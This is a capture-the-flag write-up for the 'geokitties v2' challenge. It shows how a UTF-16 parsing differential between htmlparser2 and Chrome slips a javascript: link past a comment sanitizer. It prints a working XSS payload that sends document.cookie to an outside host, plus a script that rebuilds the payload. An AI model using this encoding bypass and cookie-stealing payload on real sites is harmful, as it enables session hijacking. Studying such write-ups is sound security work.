Overview

Problem page:
https://geokittiesv2.web.ctfcompetition.com/

Copy of source code:
https://gist.github.com/tyage/cac08c8e17b90b840fb22cb434cff127

The page accepts a comment; the admin then reviews it and clicks the link inside it.

The comment is validated with htmlparser2.

Allowed tags: p, a, b, img, br, i
Rejected attributes: any on*= event handler, and href values starting with javascript:

Solution

The task is to find a parsing differential between Google Chrome and htmlparser2.

After some time I realized that when the input looks like a UTF-16 string (each character followed by a \x00 byte), Chrome decodes the page as UTF-16, but htmlparser2 does not: it reads the bytes one by one and treats the \x00 bytes as ordinary characters.

For example, htmlparser2 parses the HTML below as an element with the tag name \x00a\x00 (Chrome, decoding it as UTF-16, sees a plain <a></a>).

\x00<\x00a\x00>\x00<\x00/\x00a\x00>\x00

<\x00a\x00> is not an allowed tag, so the validator rejects it; instead we need something htmlparser2 sees as a valid link, like below.

\x00<a \x00>\x00<\x00/\x00a\x00>\x00

Now htmlparser2 recognizes an a tag, but Chrome does not see an HTML element there.

So we can construct a payload that htmlparser2 accepts but that Chrome renders as a real <a href=javascript:...> link:

'\x00<a \x00' + "<a href='javascript:location.href=`//tyage.net/`+document.cookie'>".split('').join('\x00') + '</a>'
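As an added example (not part of the original writeup or the challenge code), the script below reproduces the differential offline: a simplified byte-level tokenizer standing in for htmlparser2, an approximation of the filter rules listed above, and a by-hand UTF-16BE decode standing in for Chrome. Decoding as UTF-16 big-endian is my inference from the leading \x00 bytes in the payload; the tokenizer and validator are stand-ins, not the real htmlparser2 or the challenge's own filter.

```javascript
// Added example: reproduces the htmlparser2 / Chrome parsing differential
// described in the writeup. tokenizeBytes() is a simplified stand-in for
// htmlparser2, validate() approximates the filter rules the writeup lists,
// and decodeUtf16be() stands in for Chrome's UTF-16 decode. None of this is
// the challenge's real code.

const ALLOWED_TAGS = new Set(['p', 'a', 'b', 'img', 'br', 'i']);

// Build the payload exactly as in the writeup: an '<a \x00' tag for the
// byte-level parser, then a \x00-interleaved link that only Chrome decodes.
function buildPayload(jsUrl) {
  const inner = `<a href='${jsUrl}'>`;
  return '\x00<a \x00' + inner.split('').join('\x00') + '</a>';
}

// Minimal byte-oriented tokenizer: '<' opens a tag, the tag name runs to the
// first whitespace or '>', and everything up to the next '>' is attribute text.
// Like htmlparser2, a '<' inside a tag is just another attribute-name byte,
// and \x00 is not whitespace, so it never terminates a name.
function tokenizeBytes(s) {
  const tokens = [];
  let i = 0;
  while (i < s.length) {
    if (s[i] !== '<') {
      let j = s.indexOf('<', i);
      if (j === -1) j = s.length;
      tokens.push({ type: 'text', data: s.slice(i, j) });
      i = j;
      continue;
    }
    let end = s.indexOf('>', i);
    if (end === -1) end = s.length;
    const body = s.slice(i + 1, end);
    if (body.startsWith('/')) {
      tokens.push({ type: 'close', name: body.slice(1).trim() });
    } else {
      const m = body.match(/^(\S*)\s*([\s\S]*)$/);
      const attrs = {};
      for (const part of m[2].split(/\s+/).filter(Boolean)) {
        const eq = part.indexOf('=');
        const name = eq === -1 ? part : part.slice(0, eq);
        const value = eq === -1 ? '' : part.slice(eq + 1).replace(/^['"]|['"]$/g, '');
        attrs[name] = value;
      }
      tokens.push({ type: 'open', name: m[1], attrs });
    }
    i = end + 1;
  }
  return tokens;
}

// Approximation of the challenge filter as described in the writeup:
// only whitelisted tag names, no on*= handlers, no javascript: hrefs.
// Returns null when the comment is accepted, otherwise the rejection reason.
function validate(tokens) {
  for (const t of tokens) {
    if (t.type === 'text') continue;
    if (!ALLOWED_TAGS.has(t.name)) return `tag not allowed: ${JSON.stringify(t.name)}`;
    if (t.type !== 'open') continue;
    for (const [name, value] of Object.entries(t.attrs)) {
      if (/^on/i.test(name)) return `event handler: ${name}`;
      if (name.toLowerCase() === 'href' && /^\s*javascript:/i.test(value)) return 'javascript: href';
    }
  }
  return null;
}

// What Chrome sees once it treats the page as UTF-16BE: each pair of bytes is
// one code unit. Done by hand so the example needs no ICU; a trailing odd byte
// is dropped here (a real decoder would emit U+FFFD for it).
function decodeUtf16be(s) {
  const bytes = Buffer.from(s, 'latin1');
  let out = '';
  for (let i = 0; i + 1 < bytes.length; i += 2) {
    out += String.fromCharCode((bytes[i] << 8) | bytes[i + 1]);
  }
  return out;
}

// Both views of one payload. In the Chrome view a '<' followed by a non-ASCII
// letter is emitted as text, so the stray '<' before the real anchor is harmless.
function analyze(payload) {
  const byteTokens = tokenizeBytes(payload);
  const chromeView = decodeUtf16be(payload);
  const link = chromeView.match(/<a href='([^']*)'>/);
  return {
    byteTokens,
    filterVerdict: validate(byteTokens), // null means the filter accepts it
    chromeView,
    chromeHref: link ? link[1] : null,
  };
}

const demo = analyze(buildPayload('javascript:location.href=`//tyage.net/`+document.cookie'));
console.log(JSON.stringify(demo, null, 2));
```

Running it shows the filter's view is a single `a` element whose attribute names are garbage (none of them is `href` or `on...`), while the UTF-16 view contains a live `<a href='javascript:...'>` whose link text is the two CJK characters that `</a>` decodes to, giving the admin something to click.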

Finally, the admin clicks the link and we receive the flag: CTF{i_HoPe_YoU_fOunD_tHe_IntEndeD_SolUTioN_tHis_Time}